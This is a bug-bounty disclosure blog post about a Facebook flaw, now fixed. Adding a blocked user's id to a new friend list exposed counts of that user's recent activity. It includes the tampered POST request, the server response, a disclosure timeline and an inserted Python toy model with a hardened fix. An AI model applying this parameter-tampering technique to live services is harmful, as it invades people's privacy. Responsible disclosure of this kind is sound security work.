Wednesday 29 April 2015

Privacy leakage vulnerability in facebook - PoC by Shailesh Suthar



Privacy Leakage : Counts of actions of a blocked user can be viewed.

Hello, I am Shailesh Suthar, an independent security researcher. I found a vulnerability that allowed me to view counts of the recent updates of a blocked user. It was also possible to view counts of updates regarding status, photos, games, comments and likes, music and videos, and other activities separately!

PoC: 
When we create a new friend list, the following POST request is generated:

POST /friends/edit/ajax/save_list/ HTTP/1.1
Host: www.facebook.com
...
 
fb_dtsg=AQHtqbvxxxxx&listname=NAME_OF_LIST&members[0]=PROFILE_ID_OF_USER&text_members[0]=NAME_OF_USER&__user=100002309650515&__a=1&__dyn=xxxxxEyl2lm9o-t2u5bHaEWCueyrhEK4xxxxxxxxxxxCqrZo8popyui9DBwIhEyfyUnwPUS2O4K5e8xxxxxxxxxxxx&__req=d3&ttstamp=2658172116113981185356757249&__rev=1711798


Then I modified two parameters as below:

            listname=Dummy
            members[0]=PROFILE_ID_OF_BLOCKED_USER

I received the response below:


for (;;);{"__ar":1,"payload":null,"onload":["goURI(\"\\\/lists\\\/ID_OF__FRIEND_LIST\");"],"bootloadable":{},"ixData":{},"lid":"0"}

The blocked person was added to a new friend list named “Dummy”, and the blocked user was the only member of this list.

Merely adding a blocked person to a friend list is not a security vulnerability in itself (it is still allowed). So I checked the Friend lists page (https://www.facebook.com/bookmarks/lists).

A count was shown next to the friend list, as pointed out in the image below!
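As an added illustration (not code from this post or from Facebook), the following Python toy model reproduces the gap the PoC describes: the save-list handler trusts the members[] parameters, so a blocked user ends up in a list whose per-list count then aggregates that user's recent updates. Beside it sits a hardened handler that rejects members with a block relationship to the requester, and a render-time filter so that lists created before such a fix cannot leak either. The user ids, the list-id format, the block store and the counting function are constructed assumptions.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

# Constructed toy model (not Facebook's code): users, block relationships,
# friend lists and a per-user count of recent updates.

@dataclass
class FriendList:
    owner: str
    name: str
    members: set = field(default_factory=set)

@dataclass
class Store:
    blocks: set = field(default_factory=set)            # (blocker, blocked) pairs
    lists: dict = field(default_factory=dict)           # list_id -> FriendList
    recent_updates: dict = field(default_factory=dict)  # user_id -> count

_MEMBER_KEY = re.compile(r"members\[(\d+)\]")

def parse_save_list(body):
    """Extract listname and the ordered members[i] values from a form-encoded body."""
    q = parse_qs(body, keep_blank_values=True)
    indexed = []
    for key, values in q.items():
        m = _MEMBER_KEY.fullmatch(key)
        if m:
            indexed.append((int(m.group(1)), values[0]))
    members = [uid for _, uid in sorted(indexed)]
    return q.get("listname", [""])[0], members

def is_blocked(store, a, b):
    """A block in either direction counts: neither side should see the other."""
    return (a, b) in store.blocks or (b, a) in store.blocks

def _create_list(store, owner, name, members):
    list_id = f"list{len(store.lists) + 1}"  # assumed id scheme
    store.lists[list_id] = FriendList(owner, name, set(members))
    return list_id

def save_list_vulnerable(store, actor, body):
    """Pre-fix behaviour as the post describes it: members[] is taken as sent."""
    name, members = parse_save_list(body)
    return {"ok": True, "list_id": _create_list(store, actor, name, members)}

def save_list_fixed(store, actor, body):
    """Hardened handler: refuse the whole request if any member is blocked."""
    name, members = parse_save_list(body)
    rejected = [m for m in members if is_blocked(store, actor, m)]
    if rejected:
        return {"ok": False, "error": "blocked_member", "rejected": rejected}
    return {"ok": True, "list_id": _create_list(store, actor, name, members)}

def list_update_count(store, viewer, list_id, enforce_blocks):
    """The number shown beside a list: recent updates of its members.
    With enforce_blocks=True, blocked members are dropped at render time, so
    lists created before the write-side fix cannot leak the count either."""
    members = store.lists[list_id].members
    if enforce_blocks:
        members = {m for m in members if not is_blocked(store, viewer, m)}
    return sum(store.recent_updates.get(m, 0) for m in members)

def demo():
    """Walk through the report with constructed data."""
    store = Store()
    store.blocks.add(("alice", "bob"))   # alice has blocked bob
    store.recent_updates["bob"] = 7      # bob posted seven updates recently
    body = ("fb_dtsg=TOKEN&listname=Dummy&members[0]=bob"
            "&text_members[0]=Bob&__user=alice&__a=1")

    leaky = save_list_vulnerable(store, "alice", body)
    leaked_count = list_update_count(store, "alice", leaky["list_id"], enforce_blocks=False)
    rendered_safely = list_update_count(store, "alice", leaky["list_id"], enforce_blocks=True)
    rejected = save_list_fixed(store, "alice", body)
    return leaked_count, rendered_safely, rejected

if __name__ == "__main__":
    print(demo())
```

The point of the two checks is defence in depth: the write-side check closes the reported path, while the render-time filter makes the count correct even for lists that already contain a blocked member or if another write path is later found to skip the check.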

I reported this to the Facebook security team, and it got fixed!
Thanks to the Facebook security team for fixing this one.


Report Timeline:
============
Dec 28, 2014 8:38pm  - Report sent
Jan 3, 2015 3:01am   - Escalation by Facebook
Jan 15, 2015 2:08am  - Fix deployed by Facebook

Mar 6, 2015 11:11pm  - Bounty of $1000 USD awarded by Facebook :)
